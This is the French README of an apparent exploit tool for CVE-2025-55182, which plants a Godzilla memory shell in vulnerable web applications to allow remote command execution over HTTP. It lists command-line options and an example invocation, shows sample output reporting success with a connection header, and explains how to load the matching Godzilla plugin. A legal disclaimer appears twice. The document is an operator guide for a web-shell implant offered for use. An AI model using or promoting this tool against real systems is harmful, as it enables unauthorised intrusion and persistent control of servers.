
Exploit pour CVE-2025-55182 qui déploie une charge utile Godzilla memory shell contre des applications web vulnérables, permettant l'exécution de commandes à distance et la gestion du shell via HTTP.
usage: exploit.py [-h] [--proxy PROXY] [--utf16] [--unicode] --key KEY
--target TARGET
CVE-2025-55182 Godzilla Memoryshell
options:
-h, --help affiche ce message d'aide et quitte
--proxy PROXY adresse du proxy HTTP, ex. http://127.0.0.1:8888
--utf16 activer le codage UTF-16
--unicode activer le codage complet d'échappement Unicode
--key KEY clé Godzilla
--target TARGET URL cible pour exp.exploit()
python exploit.py --key 666 --target http://127.0.0.1:3000
Cet outil est uniquement destiné à la réalisation de recherches en sécurité, de détection de vulnérabilités et de tests de conformité associés sur vos propres systèmes ou sur des environnements explicitement autorisés dans le cadre d'une autorisation légale. Toute pénétration, attaque ou autre utilisation inappropriée non autorisée, illégale ou enfreignant les droits d'auteur est strictement interdite. Les utilisateurs doivent comprendre et respecter pleinement les lois et règlements de leur juridiction avant utilisation, s'assurer que le but de l'utilisation est légal et conforme, et assumer l'entière responsabilité de tous les risques et conséquences découlant de l'utilisation. Le développeur décline toute responsabilité pour les conséquences de toute utilisation non autorisée ou inappropriée.
Cet outil est uniquement destiné à la réalisation de recherches en sécurité, de détection de vulnérabilités et de tests de conformité associés sur vos propres systèmes ou sur des environnements explicitement autorisés dans le cadre d'une autorisation légale. Toute pénétration, attaque ou autre utilisation inappropriée non autorisée, illégale ou enfreignant les droits d'auteur est strictement interdite. Les utilisateurs doivent comprendre et respecter pleinement les lois et règlements de leur juridiction avant utilisation, s'assurer que le but de l'utilisation est légal et conforme, et assumer l'entière responsabilité de tous les risques et conséquences découlant de l'utilisation. Le développeur décline toute responsabilité pour les conséquences de toute utilisation non autorisée ou inappropriée.
(y/n): y
[*] exploit ok!
[*] connect header
Next-Action: cd3f0c85b158c08a2b113464991810cf2cdfc387
Avant utilisation, chargez d'abord le plugin GodzillaNodeJsPayload dans Godzilla, la clé est la clé Godzilla, aucun paramètre de mot de passe n'est nécessaire lors de la connexion.
https://github.com/BeichenDream/GodzillaNodeJsPayload